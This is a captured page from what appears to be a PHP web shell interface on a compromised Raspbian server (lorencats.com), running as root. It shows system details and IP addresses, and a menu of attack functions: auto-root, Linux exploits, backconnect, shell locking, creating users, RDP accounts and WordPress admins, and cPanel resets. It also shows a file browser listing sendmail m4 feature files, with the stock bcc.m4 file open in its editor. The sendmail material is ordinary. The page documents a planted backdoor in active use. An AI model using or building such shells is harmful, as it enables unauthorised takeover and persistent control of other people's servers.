Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
sendmail /
cf /
feature /
[ HOME SHELL ]
Name
Size
Permission
Action
accept_unqualified_senders.m4
413
B
-rw-r--r--
accept_unresolvable_domains.m4
416
B
-rw-r--r--
access_db.m4
2.2
KB
-rw-r--r--
allmasquerade.m4
755
B
-rw-r--r--
always_add_domain.m4
694
B
-rw-r--r--
authinfo.m4
868
B
-rw-r--r--
badmx.m4
586
B
-rw-r--r--
bcc.m4
2.63
KB
-rw-r--r--
bestmx_is_local.m4
1.65
KB
-rw-r--r--
bitdomain.m4
996
B
-rw-r--r--
blacklist_recipients.m4
510
B
-rw-r--r--
block_bad_helo.m4
552
B
-rw-r--r--
compat_check.m4
1.13
KB
-rw-r--r--
conncontrol.m4
1.14
KB
-rw-r--r--
delay_checks.m4
772
B
-rw-r--r--
dnsbl.m4
1.4
KB
-rw-r--r--
domainmap.m4
4.25
KB
-rw-r--r--
domaintable.m4
1009
B
-rw-r--r--
drac.m4
121
B
-rw-r--r--
enhdnsbl.m4
1.91
KB
-rw-r--r--
generics_entire_domain.m4
399
B
-rw-r--r--
genericstable.m4
1022
B
-rw-r--r--
greet_pause.m4
1.23
KB
-rw-r--r--
ldap_routing.m4
1.92
KB
-rw-r--r--
limited_masquerade.m4
553
B
-rw-r--r--
local_lmtp.m4
795
B
-rw-r--r--
local_no_masquerade.m4
506
B
-rw-r--r--
local_procmail.m4
1.12
KB
-rw-r--r--
lookupdotdomain.m4
632
B
-rw-r--r--
loose_relay_check.m4
395
B
-rw-r--r--
mailertable.m4
1013
B
-rw-r--r--
masquerade_entire_domain.m4
565
B
-rw-r--r--
masquerade_envelope.m4
555
B
-rw-r--r--
msp.m4
2.91
KB
-rw-r--r--
mtamark.m4
1.14
KB
-rw-r--r--
no_default_msa.m4
382
B
-rw-r--r--
nocanonify.m4
743
B
-rw-r--r--
nopercenthack.m4
891
B
-rw-r--r--
notsticky.m4
612
B
-rw-r--r--
nouucp.m4
849
B
-rw-r--r--
nullclient.m4
1.16
KB
-rw-r--r--
prefixmod.m4
703
B
-rw-r--r--
preserve_local_plus_detail.m4
409
B
-rw-r--r--
preserve_luser_host.m4
550
B
-rw-r--r--
promiscuous_relay.m4
557
B
-rw-r--r--
queuegroup.m4
624
B
-rw-r--r--
ratecontrol.m4
1.14
KB
-rw-r--r--
redirect.m4
827
B
-rw-r--r--
relay_based_on_MX.m4
492
B
-rw-r--r--
relay_entire_domain.m4
400
B
-rw-r--r--
relay_hosts_only.m4
394
B
-rw-r--r--
relay_local_from.m4
591
B
-rw-r--r--
relay_mail_from.m4
698
B
-rw-r--r--
require_rdns.m4
383
B
-rw-r--r--
rhsbl.m4
1.48
KB
-rw-r--r--
smrsh.m4
771
B
-rw-r--r--
stickyhost.m4
546
B
-rw-r--r--
tls_session_features.m4
395
B
-rw-r--r--
use_client_ptr.m4
503
B
-rw-r--r--
use_ct_file.m4
707
B
-rw-r--r--
use_cw_file.m4
766
B
-rw-r--r--
uucpdomain.m4
990
B
-rw-r--r--
virtuser_entire_domain.m4
399
B
-rw-r--r--
virtusertable.m4
1019
B
-rw-r--r--
vnet.m4
2.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bcc.m4
divert(-1) # # Copyright (c) 2014 Proofpoint, Inc. and its suppliers. # All rights reserved. # # By using this file, you agree to the terms and conditions set # forth in the LICENSE file which can be found at the top level of # the sendmail distribution. # # divert(-1) # Arguments: # 1: Map to use # - empty/none: default map bcctable # - `access': to use access_db (with bcc: as tag) # - map definition # The map contains domain names and the RHS should be simply "ok". # If the access map is used, then its lookup algorithm is used. # Otherwise: # domain ok # matches anything@domain # .domain ok # matches any subdomain, e.g., l@sub.domain and l@sub.dom.domain # On a match, the original address will be used as bcc address unless # argument 3 is set. # 2: Name of host ([mailer:]host) # 3: Default bcc address: if set, this will be always used. # Only one of 2/3 can be empty. # Note: if Bcc address is used then only one copy will be sent! # (due to duplicate elimination) # 4: Map definition for canonicalRcpt map of address rewriting to # apply to the added bcc envelope recipients. # The option -T<TMPF> is required to handle temporary map failures. # # The ruleset must return either # - an e-mail address (user@dom.ain) which is then added as "bcc" recipient. # - an empty string: do not add a "bcc" recipient, or # - $#error: fail the SMTP transaction (e.g., temporary lookup failure) # # This feature sets O AddBcc=true ifelse(lower(_ARG_),`access',`define(`_BCC_ACCESS_', `1')') define(`_ADD_BCC_', `1') ifdef(`_BCC_ACCESS_', `dnl ifdef(`_ACCESS_TABLE_', `', `errprint(`*** ERROR: FEATURE(`bcc') requires FEATURE(`access_db') ')')') ifdef(`_BCC_ACCESS_', `', ` LOCAL_CONFIG Kbcctable ifelse(defn(`_ARG_'), `', DATABASE_MAP_TYPE MAIL_SETTINGS_DIR`bcctable', `_ARG_')') LOCAL_CONFIG O AddBcc=true ifelse(len(X`'_ARG2_),`1', `', ` DA`'_ARG2_') ifelse(len(X`'_ARG4_), `1', `', `define(`_CANONIFY_BCC_', `1')dnl define(`_NEED_SMTPOPMODES_', `1')dnl # canonical address look up for AddBcc recipients KcanonicalRcpt _ARG4_ ')dnl LOCAL_RULESETS Sbcc R< $+ > $1 ifdef(`_BCC_ACCESS_', `dnl R$+ @ $+ $: $1@$2 $| $>SearchList <! bcc> $| <D:$2> <>', `R$+ @ $+ $: $1@$2 $| $>BCC $2') R$* $| <?> $@ R$* $| $* $: ifelse(len(X`'_ARG3_),`1', `$1', `_ARG3_') ifdef(`_CANONIFY_BCC_', `dnl R$+ @ $+ $: $1@$2 $| <$(canonicalRcpt $1 @ $2 $: $)> R$* $| <> $@ R$* $| <$* <TMPF>> $#error $@ 4.3.0 $: "451 Temporary system failure. Please try again later." R$* $| <$+> $@ $2 map matched? ') ifdef(`_BCC_ACCESS_', `', ` SBCC R$+ $: $1 < $(bcctable $1 $: ? $) > R$- . $+ <?> $: $2 < $(bcctable .$2 $: ? $) > R$- . $+ <?> $: $>BCC $2 R$* <$*> $: <$2> ')
Close